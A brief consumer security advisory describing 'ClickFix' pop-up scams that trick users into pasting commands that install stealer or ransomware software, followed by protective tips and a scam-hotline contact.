- The ClickFix Browser Hijack
What You Need to Know
As of mid-April 2026, security researchers have seen a massive spike in “ClickFix” social engineering attacks. Unlike traditional malware that tries to “break in” to your computer, this scam tricks you into doing the work for the hacker. It usually starts with a fake pop-up on a website claiming your browser has a “critical error,” an “expired certificate,” or a “failed CAPTCHA.”
The pop-up provides a “Fix” button that instructs you to copy a string of code and paste it directly into your computer’s terminal or “Run” box. Because you are the one initiating the command, your antivirus software often assumes the action is legitimate. In reality, that code installs “Venom Stealer” or “Qilin” ransomware, which can encrypt your files and steal your saved passwords in under five minutes.
What You Should Do
Never copy-paste code: Avoid any website or pop-up that asks you to “copy and paste” commands into your computer’s terminal, PowerShell, or Run dialog to fix a browser issue.
Close the tab: If you see a “Critical Error” or “Google Chrome Update” pop-up that prevents you from clicking away, use Task Manager (Ctrl+Shift+Esc) to force-close your browser entirely.
Verify the source: Remember that legitimate companies like Google, Microsoft, or Cloudflare will never ask you to manually run scripts or terminal commands to verify your identity.
Update your browser: Ensure your browser is set to “Auto-Update” so you have the latest native security patches that block these malicious overlay scripts.
Run a scan: If you fear you may have clicked a suspicious link, run a full system scan using professional-grade security software immediately.
Think you are being scammed? Call our scam hotline or email us for help:
(801)-724-6211
scamwatch@invisus.com
